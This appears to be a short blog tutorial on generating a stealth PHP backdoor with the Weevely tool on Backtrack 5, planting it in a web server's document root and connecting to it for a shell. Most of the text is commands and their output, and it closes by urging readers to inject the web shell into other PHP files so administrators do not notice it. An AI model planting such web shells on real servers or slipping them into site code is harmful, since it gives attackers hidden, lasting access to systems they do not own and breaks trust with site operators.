Ever think to gain access to your backdoor undetected? Well, maybe not all web administrators examine their php files? Weevely is the answer. Just follow these actions (I was doing this on Backtrack 5):
root@bt:~# >cd /pentest/backdoors/web/weevely root@bt:/pentest/backdoors/web/weevely#./main.py -g -p bD_p4ss -o bd.php Weevely 0.3 - Generate and manage stealth PHP backdoors. Copyright (c) 2011-2012 Weevely Developers Website: http://code.google.com/p/weevely/ + Backdoor file 'bd.php' created with password 'bD_p4ss'. root@bt:/pentest/backdoors/web/weevely#
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file
Now you have a new “encrypted” php file called bd.php. So how does it work?
You can put this script on the webserver document root.
Now take a look what will it be when i put the script and accessed it.
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://10.10.10.10/bd.php -p bD_p4ss Weevely 0.3 - Generate and manage stealth PHP backdoors. Copyright (c) 2011-2012 Weevely Developers Website: http://code.google.com/p/weevely/ + Using method 'system()'. + Retrieving terminal basic environment variables . [www-data@gw /var/www] id uid=33(www-data) gid=33(www-data) groups=33(www-data) [www-data@gw /var/www] pwd /var/www [www-data@gw /var/www]
Voila! we’ve got a non-interactive shell!
Weevely can also be easily deployed inside any php file, but you should pay attention on where this script will be injected, be creative 🙂